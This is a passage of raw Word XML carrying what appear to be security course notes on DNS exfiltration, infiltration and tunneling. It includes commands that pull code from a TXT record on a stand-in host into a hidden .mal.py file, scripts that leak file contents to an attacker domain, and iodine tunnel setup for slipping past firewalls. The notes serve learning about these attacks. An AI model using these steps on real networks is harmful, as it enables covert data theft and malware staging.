        <w:t>cyberattack on servers via DNS, performed either manually or automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC0DB3" w14:textId="56ACC5BD" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS is typically available on target machines and allows outbound traffic over TCP/UDP Port 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2AD2DB" w14:textId="5A023D5D" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can allow a transfer of a large volume of data from target environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F90E46" w14:textId="526DD471" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mostly used by adding strings containing desired loot to DNS UDP requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7BC459" w14:textId="4D2FB823" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>string containing loot can be sent to a rogue DNS server that logs these requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB7FD24" w14:textId="20E86A8A" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>would look like normal DNS traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4BF332" w14:textId="4CB11BC0" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>length of a DNS name is 253 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4182702A" w14:textId="0B7E4C61" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Exfiltration – Demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEEFEC8" w14:textId="6C8BDAE6" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>packet.py script – provide arguments for target filename and domain name of attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C59AD0E" w14:textId="7F856E8E" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. python packet.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEF2FDA" w14:textId="21E65CA2" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Filename: &lt;target filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C7085" w14:textId="72CCAD56" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Domain Name: </w:t>
      </w:r>
      <w:r w:rsidR="00D7649E">
        <w:t>&lt;attacker domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3122A43E" w14:textId="21B7D837" w:rsidR="00D7649E" w:rsidRDefault="00D7649E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>script obfuscates strings from target file and sends to DNS server, with information captured via wireshark or tshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EE7094" w14:textId="77777777" w:rsidR="00D56327" w:rsidRDefault="00D56327" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E72CFDF" w14:textId="6700DDBC" w:rsidR="00D7649E" w:rsidRDefault="00D7649E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>packetyGrabber.py – provide arguments for pcap file captured, output file name where data will be stored, and domain name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E37FE" w14:textId="06C0EC19" w:rsidR="00D7649E" w:rsidRDefault="00D7649E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>File Captured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322E2DA9" w14:textId="08C668D6" w:rsidR="00D7649E" w:rsidRDefault="00D7649E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Filename Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB09755" w14:textId="6A6192E3" w:rsidR="00D7649E" w:rsidRDefault="00D7649E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4D065A" w14:textId="1DAB844C" w:rsidR="00D56327" w:rsidRDefault="00D56327" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Infiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF1666" w14:textId="326DC9AC" w:rsidR="00D56327" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Malicious code is ran to manipulate DNS servers for file dropping and malware stagging efforts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE9391" w14:textId="417C7738" w:rsidR="00F67BA0" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>detectable but if missed, can lead to RCE within victim environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF678E2" w14:textId="1B2593E4" w:rsidR="00F67BA0" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>assist in C2 establishment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA75784" w14:textId="462E24C8" w:rsidR="00F67BA0" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>commonly uses TXT record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7345E54B" w14:textId="187F02F9" w:rsidR="00F67BA0" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Infiltration – Demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BED4AE3" w14:textId="5EE3E102" w:rsidR="00F67BA0" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Due to limited size of TXT records (255), attackers will use multiple TXT records configured for DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673BF279" w14:textId="74B94CC6" w:rsidR="00F67BA0" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Request TXT Records </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Capture Values </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Decode </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Infiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C33002" w14:textId="68C073D4" w:rsidR="00F67BA0" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2871FF" w14:textId="182D0FFB" w:rsidR="00F67BA0" w:rsidRDefault="00F67BA0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nslookup -type=txt</w:t>
      </w:r>
      <w:r w:rsidR="008E1997">
        <w:t xml:space="preserve"> &lt;txt record.domain&gt; | grep Za | cut -d \” -f2 &gt; .mal.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CAC41D" w14:textId="75516A7B" w:rsidR="008E1997" w:rsidRDefault="008E1997" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>packetySimple.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6EEC9D" w14:textId="25E47902" w:rsidR="008E1997" w:rsidRDefault="008E1997" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Filename: &lt;whatever name file was saved to, ex. .mal.py&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49030B75" w14:textId="4C1A34BC" w:rsidR="008E1997" w:rsidRDefault="008E1997" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Infiltration – Practical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D0213" w14:textId="66296998" w:rsidR="008E1997" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nslookup -type=txt code.badbaddoma.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC4E91F" w14:textId="6A82EE33" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use first two characters of string text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF8FA5C" w14:textId="49C6C1FC" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>replace Za from above with two new letters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690CAF85" w14:textId="0A91B28C" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>repeat process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B60BB" w14:textId="7B1A4C0D" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE4760D" w14:textId="102BBD45" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Due to the presence of firewalls and IPS, DNS Tunneling is popular to bypass these features as DNS is often overlooked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7908BA35" w14:textId="74E6BC3E" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP over DNS using Iodine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D09F1E" w14:textId="38AC2E80" w:rsidR="00464F1B" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId224" w:history="1">
        <w:r w:rsidR="00464F1B" w:rsidRPr="009E2FCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://code.kryo.se/iodine/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16F23418" w14:textId="4C8F5D6C" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Tunnel Server + DNS Tunnel Client + Public Domain Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFC32A" w14:textId="0C6D0279" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Configuration within Public Domain Name Host (Name, Type, TTL, Data Categories respectively)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4730CBFD" w14:textId="09E65F9B" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. tundns – NS – 1h – tunnel.badbadtunnel.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EE8576" w14:textId="1469CCF8" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>tunnel – A – 1h – 3.17.153.29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0356EF9B" w14:textId="1F60DD3B" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>both machines need Iodine installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213E18B" w14:textId="78B689E3" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install iodine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD4D403" w14:textId="6875A4D8" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>iodine – Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB31FA1" w14:textId="7C375D7B" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>iodine – Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFB99C" w14:textId="2C03C3CD" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>on Server - sudo iodined -b &lt;port&gt; -f &lt;ip for DNS Tunnel Server&gt; &lt;subdomain name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC361E" w14:textId="277B6BB6" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. sudo iodined -b 27001 -f 10.0.0.1 tunnel.badbadtunnel.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DFEF99" w14:textId="40A01AB5" w:rsidR="00464F1B" w:rsidRDefault="00464F1B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>on Client – sudo iodine &lt;IP of DNS Tunnel Server</w:t>
      </w:r>
      <w:r w:rsidR="00773362">
        <w:t>&gt; &lt;subdomain name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D6FCA" w14:textId="39D902C5" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. sudo iodine 3.17.153.29 tunnel.badbadtunnel.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C1B94" w14:textId="4D04A490" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ping DNS Tunnel Server to confirm connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A0287" w14:textId="37E7737A" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Generate SSH key and upload content of id_rsa.pub to DNS Tunnel Server in authorized_keys file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4545D993" w14:textId="032A10A2" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ssh -keygen -t rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCCE5F" w14:textId="03AFCA92" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat .ssh/id_rsa.pub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB02CF" w14:textId="70F384D9" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C021F1" w14:textId="493C63C1" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cat authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBC4BF" w14:textId="55873C47" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4020412A" w14:textId="0A21C9B0" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSH to DNS Tunnel Server with option -D 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D431198" w14:textId="0691B3C9" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Open Browser and change proxy settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAAE988" w14:textId="1BA630F5" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can use FoxyProxy or ProxySwitchyOmega</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0F89A" w14:textId="453DD6AF" w:rsidR="00773362" w:rsidRDefault="00773362" w:rsidP="007F0512">
      <w:pPr>
